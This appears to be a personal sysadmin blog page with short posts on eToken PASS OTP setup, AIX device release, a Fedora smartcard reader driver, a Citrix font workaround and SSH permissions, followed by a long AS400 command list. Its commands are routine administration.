Tech

eToken PASS in open environment

I bought promo pack of 5 Aladdin eToken PASS units, the tokens comes with serial number in this format: XXXX-XXXX-XXXX-XXXX activated for free on the website of the manufacturer only one time of course, then used token purchased from ebay usually are unusable.

The activation consists in a zip containing two ldif format dat files, you can extract the token key parsing the text from “importAlpine.dat” file:

sccAuthenticatorId: (means token serial number) sccKey= (means token key)

eToken PASS are event based tokens, I’ve tested successfully using otptool, part of mod-authn-otp.

eToken PASS in open environment Read More »

AIX LPAR – CDROM device relase

When AIX will not release /dev/cd0 device (after umount any associted filesystems), and you get busy device error on dlpar operations, use this command to kill all processes that take busy resource:

# fuser -k -x -u -c /dev/cd0

Usually in pSeries hardware configuration is connected to a scsi controller by scsi-to-ide/sas/sata or other terrible solution bridge.

To made all this operation faster you can identify pci parent adapter and remove recursively all device.

Identify:

# lsdev -l cd0 -F parent
scsi0
# lsdev -l scsi0 -F parent
sisscsia0
# lsdev -l sisscsia0 -F parent
pci10

Remove:


# rmdev -Rdl pci10
cd0 deleted
ses0 deleted
scsi0 deleted
sisscsia0 deleted
pci10 deleted

Then you can move the controller from HMC to another LPAR

AIX LPAR – CDROM device relase Read More »

Omikey Cardman 4040 – Linux FC14

In this post I describe how to get works OMNIKEY Cardman 4040, a pcmcia smartcard reader/writer under Linux Ferdora 14 using manufacturer PC/SC driver.

1. Install the required packages:

[root@thinkleo1 ~]# yum install pcsc-lite openct opensc

2. Configure OpenSC

With PC/SC cardbus access OpenCT is useless but without that daemon, on every smartcard operational commad you get lot of this erros:

Error: can't open /var/run/openct/status: No such file or directory

Then to avoid (openct/opensc/pcscd) conflicts I prefer to disable openct framework like this:

Substitute into /etc/opensc.conf :

reader_drivers = openct, pcsc, ctapi;

With (if is not present, add this under “app default” context):

reader_drivers = pcsc, ctapi;

Stop OpenCT daemon:

[root@thinkleo1 ~]# /etc/init.d/openct stop

3. Install PC/SC driver

Download PC/SC driver for Linux form:

http://www.hidglobal.com/

Actual release is “ifdok_cm4040_lnx-2.0.0.tar.gz” this file contains a nice installer, but doesn’t work under fedora, then proceed manually:

[root@thinkleo1 ~]# tar -xvf ifdok_cm4040_lnx-2.0.0.tar.gz
[root@thinkleo1 ~]# cd ifdok_cm4040_lnx-2.0.0
[root@thinkleo1 ifdok_cm4040_lnx-2.0.0]# cp ifdok_cm4040_lnx-2.0.0.so /usr/lib/pcsc/drivers/

Create file: /etc/reader.conf.d/cardman4040.conf

With this content (adjust that if you have more that one pcmcia slot) :

#
# Configuration file for CardMan 4040 smartcard reader.
#
FRIENDLYNAME "OMNIKEY CardMan 4040 Socket 0"
DEVICENAME /dev/cmx0
LIBPATH /usr/lib/pcsc/drivers/ifdok_cm4040_lnx-2.0.0.so
CHANNELID 0

Now insert the smartcard reader into pcmcia slot and restart pcscd:

[root@thinkleo1 ~]# /etc/init.d/pcscd restart

4. Test the reader:

If all works fine you can get this output:

[root@thinkleo1 ~]# opensc-tool -l
Readers known about:
Nr. Driver Name
0 pcsc OMNIKEY CardMan 4040 Socket 0 00 00
[root@thinkleo1 ~]#

Now the reader is ready to use.

Omikey Cardman 4040 – Linux FC14 Read More »

Citrix – ICAClient issue on Linux FC13

If you are using Citrix ICA Client (v.11.100) on Linux specially Fedora 13 after “java-1.6.0-openjdk” update the following dependencies will be installed:

baekmuk-ttf-batang-fonts                             2.2-29.fc13
baekmuk-ttf-dotum-fonts                              2.2-29.fc13
baekmuk-ttf-fonts-common                             2.2-29.fc13
baekmuk-ttf-gulim-fonts                              2.2-29.fc13
baekmuk-ttf-hline-fonts                              2.2-29.fc13
cjkuni-ukai-fonts                                    0.2.20080216.1-42.fc13
cjkuni-uming-fonts                                   0.2.20080216.1-42.fc13
lohit-malayalam-fonts                                2.4.4-5.fc13
sazanami-fonts-common                                0.20040629-14.fc13
sazanami-gothic-fonts                                0.20040629-14.fc13
sazanami-mincho-fonts                                0.20040629-14.fc13

After this updates ICAClient stops working with flollowing error:


Warning:
Name: FONTLIST_DEFAULT_TAG_STRING
Class: XmRendition
Conversion failed.  Cannot load font.

The problem was located under “sazanami-mincho-fonts”

I’ve no time to fix fontpath problem in this stupid application developed in motif, then my little workaround was:

Blacklist package under /etc/yum.conf

exclude=sazanami-mincho-fonts*

If you are already installed:

[root@thinkleo1 leo]# rpm -e --nodeps  sazanami-mincho-fonts

Citrix – ICAClient issue on Linux FC13 Read More »

.ssh – Permission

If any of the files (or directories leading up to the files) have permissions set too loose, the connection will fail. Permission errors may be logged on the server side by the sshd(8) daemon.

Authentication refused: bad ownership or modes for directory …

In most cases, potential permission problems can be solved by restricting down access to the SSH configuration files. Permission changes to the home directory might be needed, though restricted rights may break other things.

server$ chmod go-w ~/
server$ chmod 700 ~/.ssh
server$ chmod 600 ~/.ssh/authorized_keys

.ssh – Permission Read More »

AS400 – Commands

AS400 Commands

ADDACC Add Access Code
ADDAJE Add Autostart Job Entry
ADDALRACNE Add Alert Action Entry
ADDALRD Add Alert Description
ADDALRSLTE Add Alert Selection Entry
ADDAUTLE Add Authorization List Entry
ADDBKP Add Breakpoint
ADDBNDDIRE Add Binding Directory Entry
ADDCCTRTE Add Circuit Route
ADDCCTSRV Add Circuit Service
ADDCFGLE Add Configuration List Entries
ADDCMNE Add Communications Entry
ADDCNNLE Add Connection List Entry
ADDCOMSNMP Add Community for SNMP
ADDDIRE Add Directory Entry
ADDACC Add Access Code
ADDAJE Add Autostart Job Entry
ADDALRACNE Add Alert Action Entry
ADDALRD Add Alert Description
ADDALRSLTE Add Alert Selection Entry
ADDAUTLE Add Authorization List Entry
ADDBKP Add Breakpoint
ADDBNDDIRE Add Binding Directory Entry
ADDCCTRTE Add Circuit Route
ADDCCTSRV Add Circuit Service
ADDCFGLE Add Configuration List Entries
ADDCMNE Add Communications Entry
ADDCNNLE Add Connection List Entry
ADDCOMSNMP Add Community for SNMP
ADDDIRE Add Directory Entry
ADDDIRSHD Add Directory Shadow System
ADDDLOAUT Add DLO Authority
ADDDSTLE Add Distribution List Entry
ADDDSTQ Add Distribution Queue
ADDDSTRTE Add Distribution Route
ADDDSTSYSN Add Secondary System Name
ADDDTADFN Add Data Definition
ADDEMLCFGE Add Configuration Entry
ADDENVVAR Add Environment Variable
ADDEWCBCDE Add EWC Barcode Entry
ADDEWCM Add Wireless Ctl Member
ADDEWCPTCE Add EWC PTC Entry
ADDEWLM Add Wireless Line Member
ADDEXITPGM Add Exit Program
ADDFCTE Add Forms Control Entry
ADDFNTTBLE Add Font Table Entry
ADDICFDEVE Add ICF Device Entry
ADDIPIADR Add IP over IPX Address
ADDIPIIFC Add IP over IPX Interface
ADDIPIRTE Add IP over IPX Route
ADDIPSIFC Add IP over SNA Interface
ADDIPSLOC Add IP over SNA Location
ADDIPSRTE Add IP over SNA Route
ADDIPXCCT Add IPX Circuit
ADDJOBJS Add Job using Job Scheduler
ADDJOBQE Add Job Queue Entry
ADDJOBSCDE Add Job Schedule Entry
ADDLANADPI Add LAN Adapter Information
ADDLFM Add Logical File Member
ADDLIBLE Add Library List Entry
ADDLICKEY Add License Key Information
ADDLNK Add Link
ADDMFS Add Mounted FS
ADDMSGD Add Message Description
ADDNCK Add Nickname
ADDNETJOBE Add Network Job Entry
ADDNETTBLE Add Network Table Entry
ADDNODLE Add Node List Entry
ADDNWSSTGL Add Server Storage Link
ADDOPTCTG Add Optical Cartridge
ADDOPTSVR Add Optical Server
ADDPCLTBLE Add Protocol Table Entry
ADDPEXDFN Add PEX Definition
ADDPFCST Add PF Constraint
ADDPFM Add Physical File Member
ADDPFRCOL Add Performance Collection
ADDPFTRG Add Physical File Trigger
ADDPFVLM Add Phy File Variable Len Mbr
ADDPGM Add Program
ADDPJE Add Prestart Job Entry
ADDPRBACNE Add Problem Action Entry
ADDPRBSLTE Add Problem Selection Entry
ADDRDBDIRE Add RDB Directory Entry
ADDREXBUF Add REXX Buffer
ADDRJECMNE Add RJE Communication Entry
ADDRJERDRE Add RJE Reader Entry
ADDRJEWTRE Add RJE Writer Entry
ADDRMTDFN Add Remote Definition
ADDRMTSVR Add Remote Server
ADDRPYLE Add Reply List Entry
ADDRTGE Add Routing Entry
ADDSCHIDXE Add Search Index Entry
ADDSNILOC Add SNA over IPX Location
ADDSOCE Add Sphere of Control Entry
ADDSRVTBLE Add Service Table Entry
ADDTAPCTG Add Tape Cartridge
ADDTCPHTE Add TCP/IP Host Table Entry
ADDTCPIFC Add TCP/IP Interface
ADDTCPLNK Add TCP/IP Link
ADDTCPPORT Add TCP/IP Port Restriction
ADDTCPRSI Add TCP/IP Remote System
ADDTCPRTE Add TCP/IP Route
ADDTRC Add Trace
ADDWSE Add Work Station Entry
ALCOBJ Allocate Object
ANSLIN Answer Line
ANSQST Answer Questions
ANZACCGRP Analyze Process Access Group
ANZBESTMDL Analyze BEST/1 Model
ANZDBF Analyze Database Files
ANZDBFKEY Analyze Database File Keys
ANZDFTPWD Analyze Default Passwords
ANZPFRDTA Analyze Performance Data
ANZPGM Analyze Programs
ANZPRB Analyze Problem
ANZPRFACT Analyze Profile Activity
ANZQRY Analyze Query
ANZS34OCL Analyze S/34 OCL
ANZS36OCL System/36 OCL Analysis
ANZUSROBJ ANALYZE USER OBJECTS
APING Verify APPC Connection
APYJRNCHG Apply Journaled Changes
APYPTF Apply Program Temporary Fix
AREXEC Run Remote Command
ASKQST Ask Question
BCHJOB Batch Job
CALL Call Program
CALLPRC Call Bound Procedure
CD Change Current Directory
CFGDEVMLB Configure Device Media Library
CFGDSTSRV Configure Distribution Service
CFGIPI Configure IPI
CFGIPS Configure IP over SNA
CFGIPX Configure IPX
CFGRPDS Configure VM/MVS Bridge
CFGSYSSEC Configure System Security
CFGTCP Configure TCP/IP
CFGTCPAPP Configure TCP/IP Applications
CFGTCPBP Configure TCP/IP BOOTP
CFGTCPFTP Configure TCP/IP FTP
CFGTCPHTTP Configure TCP/IP HTTP
CFGTCPLPD Configure TCP/IP LPD
CFGTCPPTP Configure Point-to-Point TCPIP
CFGTCPRTD Configure TCP/IP RouteD
CFGTCPRXC Configure TCP/IP REXEC
CFGTCPSMTP Configure TCP/IP SMTP
CFGTCPSNMP Configure TCP/IP SNMP
CFGTCPTELN Configure TCP/IP TELNET
CFGTCPWSG Configure TCP/IP Workstation
CHDIR Change Current Directory
CHGACGCDE Change Accounting Code
CHGACTPRFL Change Active Profile List
CHGACTSCDE Change Activation Scd Entry
CHGAJE Change Autostart Job Entry
CHGALRACNE Change Alert Action Entry
CHGALRD Change Alert Description
CHGALRSLTE Change Alert Selection Entry
CHGALRTBL Change Alert Table
CHGAUD Change Auditing Value
CHGAUT Change Authority
CHGAUTJS Change Job Authority using JS
CHGAUTLE Change Auth List Entry
CHGBCKUP Change Backup Options
CHGBPA Change BOOTP Attributes
CHGCCTRTE Change Circuit Route
CHGCCTSRV Change Circuit Service
CHGCFGL Change Configuration List
CHGCFGLE Change Cfg List Entries
CHGCLNUP Change Cleanup
CHGCLS Change Class
CHGCMD Change Command
CHGCMDDFT Change Command Default
CHGCMNE Change Communications Entry
CHGCNNL Change Connection List
CHGCNNLE Change Connection List Entry
CHGCOMSNMP Change Community for SNMP
CHGCOSD Change Class-of-Service Desc
CHGCRQD Change CRQ Description
CHGCSI Change Comm Side Information
CHGCTLAPPC Change Ctl Desc (APPC)
CHGCTLASC Change Ctl Desc (Async)
CHGCTLBSC Change Ctl Desc (BSC)
CHGCTLFNC Change Ctl Desc (Finance)
CHGCTLHOST Change Ctl Desc (SNA Host)
CHGCTLLWS Change Ctl Desc (Local WS)
CHGCTLNET Change Ctl Desc (Network)
CHGCTLRTL Change Ctl Desc (Retail)
CHGCTLRWS Change Ctl Desc (Remote WS)
CHGCTLTAP Change Ctl Desc (Tape)
CHGCTLVWS Change Ctl Desc (Virtual WS)
CHGCURDIR Change Current Directory
CHGCURLIB Change Current Library
CHGDBG Change Debug
CHGDDMF Change DDM File
CHGDEVAPPC Change Device Desc (APPC)
CHGDEVASC Change Device Desc (Async)
CHGDEVBSC Change Device Desc (BSC)
CHGDEVDKT Change Device Desc (Diskette)
CHGDEVDSP Change Device Desc (Display)
CHGDEVFNC Change Device Desc (Finance)
CHGDEVHOST Change Device Desc (SNA Host)
CHGDEVINTR Change Device Desc (Intra)
CHGDEVMLB Change Device Desc (Media Lib)
CHGDEVNET Change Device Desc (Network)
CHGDEVOPT Change Device Desc (Optical)
CHGDEVPR Change Device Desc (Printer)
CHGDEVRTL Change Device Desc (Retail)
CHGDEVSNPT Change Device Desc (SNPT)
CHGDEVSNUF Change Device Desc (SNUF)
CHGDEVTAP Change Device Desc (Tape)
CHGDIRE Change Directory Entry
CHGDIRSHD Change Directory Shadow System
CHGDKTF Change Diskette File
CHGDLOAUD Change DLO Auditing Level
CHGDLOAUT Change DLO Authority
CHGDLOOWN Change DLO Owner
CHGDLOPGP Change DLO Primary Group
CHGDOCD Change Do*****ent Description
CHGDSPF Change Display File
CHGDSTA Change Distribution Attributes
CHGDSTD Change Distribution
CHGDSTL Change Distribution List
CHGDSTPWD Change DST Password
CHGDSTQ Change Distribution Queue
CHGDSTRTE Change Distribution Route
CHGDTA Change Data
CHGDTAARA Change Data Area
CHGEMLCFGE Change Configuration Entry
CHGENVVAR Change Environment Variable
CHGEWCBCDE Change EWC Barcode Entry
CHGEWCM Change Wireless Ctl Member
CHGEWCPTCE Change EWC PTC Entry
CHGEWLM Change Wireless Line Member
CHGEXPSCDE Change Expiration Scd Entry
CHGFCNARA Change Functional Area
CHGFCT Change Forms Control Table
CHGFCTE Change Forms Control Entry
CHGFTPA Change FTP Attributes
CHGFTR Change Filter
CHGGPHFMT Change Graph Format
CHGGPHPKG Change Graph Package
CHGGRPA Change Group Attributes
CHGHLLPTR Change HLL Pointer
CHGHTTPA Change HTTP Attributes
CHGICFDEVE Change ICF Device Entry
CHGICFF Change ICF File
CHGIPIADR Change IP over IPX Address
CHGIPIIFC Change IP over IPX Interface
CHGIPLA Change IPL Attributes
CHGIPSIFC Change IP over SNA Interface
CHGIPSLOC Change IP over SNA Location
CHGIPSTOS Change IP over SNA TOS
CHGIPXCCT Change IPX Circuit
CHGIPXD Change IPX Description
CHGJOB Change Job
CHGJOBD Change Job Description
CHGJOBJS Change Job using Job Scheduler
CHGJOBQE Change Job Queue Entry
CHGJOBSCDE Change Job Schedule Entry
CHGJOBTYP Change Job Type
CHGJRN Change Journal
CHGKBDMAP Change Keyboard Map
CHGLANADPI Change LAN Adapter Information
CHGLF Change Logical File
CHGLFM Change Logical File Member
CHGLIB Change Library
CHGLIBL Change Library List
CHGLICINF Change License Information
CHGLINASC Change Line Desc (Async)
CHGLINBSC Change Line Desc (BSC)
CHGLINDDI Change Line Desc (DDI)
CHGLINETH Change Line Desc (Ethernet)
CHGLINFAX Change Line Desc (Fax)
CHGLINFR Change Line Desc (Frame Relay)
CHGLINIDLC Change Line Desc (IDLC)
CHGLINNET Change Line Desc (Network)
CHGLINSDLC Change Line Desc (SDLC)
CHGLINTDLC Change Line Desc (TDLC)
CHGLINTRN Change Line Desc (Token-Ring)
CHGLINWLS Change Line Desc (Wireless)
CHGLINX25 Change Line Desc (X.25)
CHGLPDA Change LPD Attributes
CHGM36CFG Change Machine Configuration
CHGMNU Change Menu
CHGMOD Change Module
CHGMODD Change Mode Description
CHGMSGD Change Message Description
CHGMSGF Change Message File
CHGMSGQ Change Message Queue
CHGNCK Change Nickname
CHGNETA Change Network Attributes
CHGNETJOBE Change Network Job Entry
CHGNFSEXP Change NFS Export
CHGNODGRPA Change Node Group Attributes
CHGNTBD Change NetBIOS Description
CHGNWIATM Change NWI ATM
CHGNWIFR Change Network Interface (FR)
CHGNWIISDN Change Network Interface ISDN
CHGNWSA Change NWS Attributes
CHGNWSALS Change Network Server Alias
CHGNWSD Change Network Server Desc
CHGNWSUSRA Change NWS User Attributes
CHGOBJAUD Change Object Auditing
CHGOBJD Change Object Description
CHGOBJOWN Change Object Owner
CHGOBJPGP Change Object Primary Group
CHGOPTA Change Optical Attributes
CHGOPTVOL Change Optical Volume
CHGOUTQ Change Output Queue
CHGOWN Change Owner
CHGPCOPRF Change PC Organizer Profile
CHGPDGPRF Change PDG Profile
CHGPEXDFN Change PEX Definition
CHGPF Change Physical File
CHGPFCST Change PF Constraint
CHGPFM Change Physical File Member
CHGPFRCOL Change Performance Collection
CHGPGM Change Program
CHGPGMVAR Change Program Variable
CHGPGP Change Primary Group
CHGPJ Change Prestart Job
CHGPJE Change Prestart Job Entry
CHGPOPA Change POP Server Attributes
CHGPRB Change Problem
CHGPRBACNE Change Problem Action Entry
CHGPRBSLTE Change Problem Selection Entry
CHGPRF Change Profile
CHGPRTF Change Printer File
CHGPSFCFG Change PSF Configuration
CHGPTR Change Pointer
CHGPWD Change Password
CHGPWRSCD Change Power On/Off Schedule
CHGPWRSCDE Change Power Schedule Entry
CHGQRYA Change Query Attributes
CHGQSTDB Change Q/A Database
CHGRCYAP Chg Recovery for Access Paths
CHGRDBDIRE Change RDB Directory Entry
CHGRJECMNE Change RJE Communication Entry
CHGRJERDRE Change RJE Reader Entry
CHGRJEWTRE Change RJE Writer Entry
CHGRMTDFN Change Remote Definition
CHGRPYLE Change Reply List Entry
CHGRTDA Change RouteD Attributes
CHGRTGE Change Routing Entry
CHGRWSPWD Change RWS Controller Password
CHGRXCA Change REXEC Attributes
CHGS34LIBM Change S/34 Library Member
CHGS36 Change S/36 Configuration
CHGS36A Change S/36 Environment Attr
CHGS36MSGL Change S/36 Message List
CHGS36PGMA Change S/36 Program Attributes
CHGS36PRCA Change S/36 Proc Attributes
CHGS36SRCA Change S/36 Source Attributes
CHGSAVF Change Save File
CHGSBSD Change Subsystem Description
CHGSCHIDX Change Search Index
CHGSECA Change Security Attributes
CHGSECAUD Change Security Auditing
CHGSHRPOOL Change Shared Storage Pool
CHGSMTPA Change SMTP Attributes
CHGSNILOC Change SNA over IPX Location
CHGSNMPA Change SNMP Attributes
CHGSPLFA Change Spooled File Attributes
CHGSRCPF Change Source Physical File
CHGSRVA Change Service Attributes
CHGSRVPGM Change Service Program
CHGSSND Change Session Description
CHGSSNMAX Change Session Maximum
CHGSYSDIRA Change System Dir Attributes
CHGSYSJOB Change System Job
CHGSYSLIBL Change System Library List
CHGSYSVAL Change System Value
CHGTAPCTG Change Tape Cartridge
CHGTAPF Change Tape File
CHGTCPA Change TCP/IP Attributes
CHGTCPHTE Change TCP/IP Host Table Entry
CHGTCPIFC Change TCP/IP Interface
CHGTCPLNK Change TCP/IP Link
CHGTCPRTE Change TCP/IP Route
CHGTELNA Change TELNET Attributes
CHGTFTPA Change TFTP Attributes
CHGUSRAUD Change User Auditing
CHGUSRPRF Change User Profile
CHGUSRPRTI Change User Print Info
CHGVAR Change Variable
CHGVT1MAP Change VT100 keyboard map
CHGVTMAP Change VT Keyboard Map
CHGWSE Change Work Station Entry
CHGWSGA Change WSG Attributes
CHGWTR Change Writer
CHKCMNTRC Check Communications Trace
CHKDKT Check Diskette
CHKDLO Check Do*****ent Library Object
CHKIN Check In Object
CHKOBJ Check Object
CHKOBJITG Check Object Integrity
CHKOUT Check Out Object
CHKPRDOPT Check Product Option
CHKPWD Check Password
CHKRCDLCK Check Record Locks
CHKS36SRCA Check S/36 Source Attributes
CHKTAP Check Tape
CLOF Close File
CLRDKT Clear Diskette
CLRJOBQ Clear Job Queue
CLRLIB Clear Library
CLRMSGQ Clear Message Queue
CLROUTQ Clear Output Queue
CLRPFM Clear Physical File Member
CLRPOOL Clear Pool
CLRSAVF Clear Save File
CLRTRCDTA Clear Trace Data
CMD Command Definition
CMPJRNIMG Compare Journal Images
CMPPFM Compare Physical File Member
CMPPTFLVL Compare PTF Level
CNLRJERDR Cancel RJE Reader
CNLRJEWTR Cancel RJE Writer
COMMIT Commit
COPY Copy Object
COPYRIGHT Copyright
CPROBJ Compress Object
CPY Copy Object
CPYCFGL Copy Configuration List
CPYDOC Copy Do*****ent
CPYF Copy File
CPYFCNARA Copy Functional Area
CPYFRMDIR Copy From Directory
CPYFRMDKT Copy From Diskette
CPYFRMPCD Copy From PC Do*****ent
CPYFRMQRYF Copy From Query File
CPYFRMSTMF Copy From Stream File
CPYFRMTAP Copy From Tape
CPYGPHFMT Copy Graph Format
CPYGPHPKG Copy Graph Package
CPYJOBJS Copy Job using Job Scheduler
CPYLIB Copy Library
CPYOPT Copy Optical
CPYPFRDTA Copy Performance Data
CPYPTF Copy Program Temporary Fix
CPYSPLF Copy Spooled File
CPYSRCF Copy Source File
CPYTODIR Copy To Directory
CPYTODKT Copy To Diskette
CPYTOPCD Copy To PC Do*****ent
CPYTOSTMF Copy To Stream File
CPYTOTAP Copy To Tape
CRTALRTBL Create Alert Table
CRTAUTHLR Create Authority Holder
CRTAUTL Create Authorization List
CRTBESTMDL Create BEST/1 Model
CRTBNDCBL Create Bound COBOL Program
CRTBNDCL Create Bound CL Program
CRTBNDDIR Create Binding Directory
CRTBNDRPG Create Bound RPG Program
CRTCBLMOD Create COBOL Module
CRTCBLPGM Create COBOL Program
CRTCFGL Create Configuration List
CRTCLD Create C Locale Description
CRTCLMOD Create CL Module
CRTCLPGM Create CL Program
CRTCLS Create Class
CRTCMD Create Command
CRTCNNL Create Connection List
CRTCOSD Create Class-of-Service Desc
CRTCRQD Create CRQ Description
CRTCSI Create Comm Side Information
CRTCTLAPPC Create Ctl Desc (APPC)
CRTCTLASC Create Ctl Desc (Async)
CRTCTLBSC Create Ctl Desc (BSC)
CRTCTLFNC Create Ctl Desc (Finance)
CRTCTLHOST Create Ctl Desc (SNA Host)
CRTCTLLWS Create Ctl Desc (Local WS)
CRTCTLNET Create Ctl Desc (Network)
CRTCTLRTL Create Ctl Desc (Retail)
CRTCTLRWS Create Ctl Desc (Remote WS)
CRTCTLTAP Create Ctl Desc (Tape)
CRTCTLVWS Create Ctl Desc (Virtual WS)
CRTDDMF Create DDM File
CRTDEVAPPC Create Device Desc (APPC)
CRTDEVASC Create Device Desc (Async)
CRTDEVBSC Create Device Desc (BSC)
CRTDEVDKT Create Device Desc (Diskette)
CRTDEVDSP Create Device Desc (Display)
CRTDEVFNC Create Device Desc (Finance)
CRTDEVHOST Create Device Desc (SNA Host)
CRTDEVINTR Create Device Desc (Intra)
CRTDEVMLB Create Device Desc (Media Lib)
CRTDEVNET Create Device Desc (Network)
CRTDEVOPT Create Device Desc (Optical)
CRTDEVPRT Create Device Desc (Printer)
CRTDEVRTL Create Device Desc (Retail)
CRTDEVSNPT Create Device Desc (SNPT)
CRTDEVSNUF Create Device Desc (SNUF)
CRTDEVTAP Create Device Desc (Tape)
CRTDFUDSPF Create DFU Display File
CRTDIR Create Directory
CRTDKTF Create Diskette File
CRTDOC Create Do*****ent
CRTDSPF Create Display File
CRTDSTL Create Distribution List
CRTDTAARA Create Data Area
CRTDTADCT Create Data Dictionary
CRTDTAQ Create Data Queue
CRTDUPOBJ Create Duplicate Object
CRTEDTD Create Edit Description
CRTFCNARA Create Functional Area
CRTFCT Create Forms Control Table
CRTFLR Create Folder
CRTFNTRSC Create Font Resource
CRTFORMDF Create Form Definition
CRTFTR Create Filter
CRTGPHFMT Create Graph Format
CRTGPHPKG Create Graph Package
CRTGSS Create Graphics Symbol Set
CRTHSTDTA Create Historical Data
CRTICFF Create ICF File
CRTIPXD Create IPX Description
CRTJOBD Create Job Description
CRTJOBQ Create Job Queue
CRTJRN Create Journal
CRTJRNRCV Create Journal Receiver
CRTLF Create Logical File
CRTLIB Create Library
CRTLINASC Create Line Desc (Async)
CRTLINBSC Create Line Desc (BSC)
CRTLINDDI Create Line Desc (DDI)
CRTLINETH Create Line Desc (Ethernet)
CRTLINFAX Create Line Desc (Fax)
CRTLINFR Create Line Desc (Frame Relay)
CRTLINIDLC Create Line Desc (IDLC)
CRTLINNET Create Line Desc (Network)
CRTLINSDLC Create Line Desc (SDLC)
CRTLINTDLC Create Line Desc (TDLC)
CRTLINTRN Create Line Desc (Token-Ring)
CRTLINWLS Create Line Desc (Wireless)
CRTLINX25 Create Line Desc (X.25)
CRTLOCALE Create Locale
CRTM36CFG Create Machine Configuration
CRTMNU Create Menu
CRTMODD Create Mode Description
CRTMSGF Create Message File
CRTMSGFMNU Create Menu from Msg Files
CRTMSGQ Create Message Queue
CRTNODGRP Create Node Group
CRTNODL Create Node List
CRTNTBD Create NetBIOS Description
CRTNWIATM Create NWI ATM
CRTNWIFR Create Network Interface (FR)
CRTNWIISDN Create Network Interface ISDN
CRTNWSALS Create Network Server Alias
CRTNWSD Create Network Server Desc
CRTNWSSTG Create NWS Storage Space
CRTOUTQ Create Output Queue
CRTOVL Create Overlay
CRTPAGDFN Create Page Definition
CRTPAGSEG Create Page Segment
CRTPDG Create Print Descriptor Group
CRTPF Create Physical File
CRTPGM Create Program
CRTPNLGRP Create Panel Group
CRTPRTF Create Printer File
CRTPSFCFG Create PSF Configuration
CRTQMFORM Create Query Management Form
CRTQMQRY Create Query Management Query
CRTQSTDB Create Q/A Database
CRTQSTLOD Create Q/A Database Load
CRTRJEBSCF Create RJE BSC File
CRTRJECFG Create RJE Configuration
CRTRJECMNF Create RJE Communication File
CRTRPGMOD Create RPG Module
CRTRPGPGM Create RPG/400 Program
CRTRPTPGM Create Auto Report RPG Program
CRTS36CBL Create S/36 COBOL Program
CRTS36DSPF Create S/36 Display File
CRTS36MNU Create S/36 Menu
CRTS36MSGF Create S/36 Message File
CRTS36RPG Create RPG II Program
CRTS36RPGR Create Console Display File
CRTS36RPT Create S/36 RPG II Auto Report
CRTSAVF Create Save File
CRTSBSD Create Subsystem Description
CRTSCHIDX Create Search Index
CRTSPADCT Create Spelling Aid Dictionary
CRTSQLC Create SQL C Program
CRTSQLCBL Create SQL COBOL Program
CRTSQLCBLI Create SQL ILE COBOL Object
CRTSQLCI Create SQL ILE C object
CRTSQLFTN Create SQL FORTRAN Program
CRTSQLPKG Create SQL Package
CRTSQLPLI Create SQL PL/I Program
CRTSQLRPG Create SQL RPG Program
CRTSQLRPGI Create SQL ILE RPG Object
CRTSRCPF Create Source Physical File
CRTSRVPGM Create Service Program
CRTSSND Create Session Description
CRTTAPCGY Create Tape Category
CRTTAPF Create Tape File
CRTTBL Create Table
CRTUDFS Create User-Defined FS
CRTUSRPRF Create User Profile
CRTVLDL Create Validation List
CRTWSCST Create WSCST
CVTBASSTR Convert S/36 Stream File
CVTBASUNF Convert S/36 Unformatted File
CVTBGUDTA Convert BGU Data
CVTCLSRC Convert CL Source
CVTDAT Convert Date
CVTDLSNAM Convert DLS Name
CVTEDU Convert Education
CVTIPSIFC Convert IP Address
CVTIPSLOC Convert Network ID / Location
CVTNAMSMTP Convert SMTP Names
CVTOPTBKU Convert Optical Backup
CVTPFRDTA Convert Performance Data
CVTRJEDTA Convert RJE Data
CVTRPGSRC Convert RPG Source
CVTS36CFG Convert S/36 Configuration
CVTS36FCT Convert Forms Control Table
CVTS36JOB Convert S/36 Migration Job
CVTS36QRY Convert S/36 Query
CVTS38JOB Convert S/38 Migration Job
CVTTCPCL Convert TCP/IP CL Source
CVTTOFLR Convert To Folder
DATA Data
DCL Declare CL Variable
DCLF Declare File
DCPOBJ Decompress Object
DEL Remove Link
DEP Dependent Definition
DLCOBJ Deallocate Object
DLTALR Delete Alert
DLTALRTBL Delete Alert Table
DLTAPARDTA Delete APAR Data
DLTAUTHLR Delete Authority Holder
DLTAUTL Delete Authorization List
DLTBESTMDL Delete BEST/1 model
DLTBNDDIR Delete Binding Directory
DLTCFGL Delete Configuration List
DLTCLD Delete C Locale Description
DLTCLS Delete Class
DLTCMD Delete Command
DLTCMNTRC Delete Communications Trace
DLTCNNL Delete Connection List
DLTCOSD Delete Class-of-Service Desc
DLTCRQD Delete CRQ Description
DLTCSI Delete Comm Side Information
DLTCSPMAP Delete CSP/AE Map Group
DLTCTLD Delete Controller Description
DLTDEVD Delete Device Description
DLTDEVMLB Delete Device Media Library
DLTDFUPGM Delete DFU Program
DLTDKTLBL Delete Diskette Label
DLTDLO Delete Do*****ent Library Object
DLTDOCL Delete Do*****ent List
DLTDST Delete Distribution
DLTDSTL Delete Distribution List
DLTDTAARA Delete Data Area
DLTDTADCT Delete Data Dictionary
DLTDTAQ Delete Data Queue
DLTEDTD Delete Edit Description
DLTF Delete File
DLTFCNARA Delete Functional Area
DLTFCT Delete Forms Control Table
DLTFNTRSC Delete Font Resource
DLTFNTTBL Delete Font Table
DLTFORMDF Delete Form Definition
DLTFTR Delete Filter
DLTGPHFMT Delete Graph Format
DLTGPHPKG Delete Graph Package
DLTGSS Delete Graphic Symbol Set
DLTHSTDTA Delete Historical Data
DLTIPXD Delete IPX Description
DLTJOBD Delete Job Description
DLTJOBQ Delete Job Queue
DLTJRN Delete Journal
DLTJRNRCV Delete Journal Receiver
DLTLIB Delete library
DLTLICPGM Delete Licensed Program
DLTLIND Delete Line Description
DLTLOCALE Delete Locale
DLTM36 Delete Machine
DLTM36CFG Delete Machine Configuration
DLTMNU Delete Menu
DLTMOD Delete Module
DLTMODD Delete Mode Description
DLTMSGF Delete Message File
DLTMSGQ Delete Message Queue
DLTNETF Delete Network File
DLTNODGRP Delete Node Group
DLTNODL Delete Node List
DLTNTBD Delete NetBIOS Descriptions
DLTNWID Delete Network Interface Desc
DLTNWSALS Delete Network Server Alias
DLTNWSAPP Delete Network Server App
DLTNWSD Delete Network Server Desc
DLTNWSSTG Delete NWS Storage Space
DLTOUTQ Delete Output Queue
DLTOVL Delete Overlay
DLTOVR Delete Override
DLTOVRDEVE Delete Override Pgm Dev Entry
DLTPAGDFN Delete Page Definition
DLTPAGSEG Delete Page Segment
DLTPDG Delete Print Descriptor Group
DLTPEXDTA Delete PEX Data
DLTPFRDTA Delete Performance Data
DLTPGM Delete Program
